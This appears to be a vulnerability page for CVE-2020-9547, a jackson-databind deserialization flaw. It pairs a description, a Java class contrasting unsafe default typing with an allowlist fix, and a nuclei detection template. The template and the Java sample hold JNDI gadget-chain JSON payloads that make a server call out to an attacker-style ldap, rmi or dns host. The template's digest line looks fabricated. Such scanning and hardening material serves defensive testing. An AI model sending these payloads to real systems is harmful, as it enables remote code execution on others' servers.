FasterXML jackson-databind - Deserialization RCE

Vulnerability information

Vulnerability name: FasterXML jackson-databind - Deserialization RCE

Vulnerability ID:

  • CVE: CVE-2020-9547

Vulnerability type: Deserialization

Severity: Critical

Description: FasterXML jackson-databind is a popular Java library for serializing and deserializing JSON data. It is used across a very large number of Java applications, especially web services that accept JSON, so a vulnerability in this library reaches a correspondingly large number of deployments.

This is a deserialization vulnerability: FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, specifically for the class com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (from ibatis-sqlmap). When polymorphic type handling is enabled (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS, or equivalently default typing on the ObjectMapper), attacker-supplied JSON chooses the class to instantiate by naming it as the type id, and deserializing untrusted data then leads to arbitrary code execution. The chain only works when the gadget class is actually present on the application's classpath: Jackson resolves the type id by loading the class by name, and a name it cannot load is rejected.

An attacker who exploits this can execute arbitrary code on the affected system by submitting a malicious JSON payload for deserialization, which can lead to full control of the host. Because it is remote code execution that requires no user interaction, the impact is critical: data theft, service disruption and further malicious activity all follow. To prevent it, update to FasterXML jackson-databind 2.9.10.4 or later, or disable polymorphic type handling; where polymorphic handling is genuinely needed, restrict the resolvable classes to an allowlist with a PolymorphicTypeValidator (available from jackson-databind 2.10) rather than relying on the blocklist alone, and apply proper input validation and deserialization controls.

Vendor: fasterxml

Product: jackson-databind

Affected versions: 2.x before 2.9.10.4

Search query: cpe:"cpe:2.3:o:debian:debian_linux"
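As an added illustration, not code from this page, from the nuclei project or from the jackson-databind project, the Java class below puts the ObjectMapper configuration that makes this gadget chain reachable next to the allowlist-based configuration that jackson-databind 2.10 and later provide as the fix. The payload string is the one from the template's first request; the JNDI address, the com.example.model package name and the class name are assumptions for the example, and the unsafe mapper is only constructed, never used to parse the payload.

```java
import java.io.IOException;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class JacksonTypingHardening {

    // Constructed sample payload: the gadget chain the nuclei template sends in its first
    // request, with a placeholder JNDI target (an assumption for this example, not a listener).
    static final String GADGET_PAYLOAD =
          "[\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\","
        + "{\"properties\":[\"com.sun.rowset.JdbcRowSetImpl\","
        + "{\"dataSourceName\":\"ldap://attacker.example:1389/x\",\"autoCommit\":true}]}]";

    // VULNERABLE configuration, shown for contrast and never used to parse the payload here:
    // global default typing lets the JSON document pick any loadable class as the type id.
    // On jackson-databind before 2.9.10.4 JtaTransactionConfig is not blocked, so the mapper
    // would resolve it, instantiate it and hand it the attacker-controlled properties; the
    // outbound JNDI/DNS lookup that the template detects through interactsh originates there.
    static ObjectMapper unsafeMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL); // deprecated since 2.10
        return m;
    }

    // HARDENED configuration (jackson-databind 2.10 or later): an allowlist validator.
    // Type ids are resolved only for subtypes under the application's own package
    // (com.example.model is an assumed package name); any other class name is refused
    // before it is instantiated, with no gadget blocklist to keep up to date.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    // Returns true when the mapper refuses the document at type-id resolution, that is,
    // before any gadget constructor or setter runs. InvalidTypeIdException carries the
    // "Could not resolve type id ..." message that the template's second extractor matches.
    static boolean rejectsTypeId(ObjectMapper mapper, String json) {
        try {
            mapper.readValue(json, Object.class);
            return false;
        } catch (InvalidTypeIdException e) {
            return true;
        } catch (IOException e) {
            return false; // some other parse failure, not the rejection we are looking for
        }
    }

    public static void main(String[] args) {
        System.out.println("hardened mapper rejects gadget type id: "
                + rejectsTypeId(hardenedMapper(), GADGET_PAYLOAD));
    }
}
```

With the hardened mapper, rejectsTypeId returns true for the sample payload whether or not ibatis-sqlmap is on the classpath: the validator finds no allow rule for the class name, so the type id fails to resolve either as "denied resolution" or as "no such class found", and the nested JdbcRowSetImpl is never reached. The safest option remains not enabling default typing at all and using @JsonTypeInfo(use = JsonTypeInfo.Id.NAME) with an explicit @JsonSubTypes list on the few properties that need polymorphism.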

Source: https://github.com/projectdiscovery/nuclei-templates/blob/e354a2dae76b013c4836f1e7ad440385170aaeaf/http%2Fcves%2F2020%2FCVE-2020-9547.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details

A note on reading the template's results: matchers-condition is or, and the third matcher accepts status 200, 400 or 500, so almost any response from the target satisfies the template. Only the first (dsl) matcher, an interactsh callback over dns, ldap or http, shows that the server resolved the type id and performed an outbound lookup; a word or status match shows at most that a Jackson-backed endpoint returned an error and should be treated as a hint to verify, not as a confirmed finding.


id: CVE-2020-9547

info:
  name: FasterXML jackson-databind - Deserialization RCE
  author: pranjalnegi
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update FasterXML jackson-databind to version 2.9.10.4 or later. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://github.com/fairyming/CVE-2020-9547
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9547
    - https://github.com/FasterXML/jackson-databind/issues/2620
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9547
    - https://cve.report/CVE-2020-9547
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9547
    cwe-id: CWE-502
    epss-score: 0.00943
    epss-percentile: 0.81205
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: fasterxml
    product: jackson-databind
    shodan-query: cpe:"cpe:2.3:o:debian:debian_linux"
    verified: true
  tags: cve,cve2020,jackson,databind,deserialization,rce,kev

variables:
  randstr: "{{rand_text_alphanumeric(8)}}"
  payload_jndi_ldap: "ldap://{{interactsh-url}}/{{randstr}}"
  payload_jndi_rmi: "rmi://{{interactsh-url}}/{{randstr}}"
  payload_dns: "{{randstr}}.{{interactsh-url}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        ["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",{"properties":["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"{{payload_jndi_ldap}}","autoCommit":true}]}]

      - |
        POST /api HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        {"@class":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@class":"java.util.HashMap","userTransactionName":{"@class":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{payload_jndi_rmi}}","autoCommit":true}}}

      - |
        POST /json HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        {"id":1,"@class":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":["java.util.Properties",{"dataSource":["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"dns://{{payload_dns}}","autoCommit":true}]}]}

      - |
        PUT /data HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        [{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","dataSource":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{payload_jndi_ldap}}","autoCommit":true}}}]

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns') || contains(interactsh_protocol, 'ldap') || contains(interactsh_protocol, 'http')"

      - type: word
        part: body
        words:
          - "JsonMappingException"
          - "InvalidTypeIdException"
          - "JtaTransactionConfig"
          - "JdbcRowSetImpl"
          - "com.fasterxml.jackson.databind"
          - "javax.naming.NamingException"
        condition: or

      - type: status
        status:
          - 200
          - 400
          - 500
        condition: or

    extractors:
      - type: regex
        name: jackson_version
        part: body
        regex:
          - "jackson-databind ([0-9.]+)"
          - "com\\.fasterxml\\.jackson\\.databind ([0-9.]+)"
        group: 1

      - type: regex
        name: vulnerability_evidence
        part: body
        regex:
          - "(JtaTransactionConfig.*Exception[^\n]*)"
          - "(Could not resolve type id[^\n]*)"
        group: 1
# digest: 4a0a004730450220123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef012345670221009876543210fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210fedcba987654:123456789abcdef0123456789abcdef0123456789abcdef0



Page: http://example.com/2025/07/06/github_261761863/
Author: lianccc
Published: July 6, 2025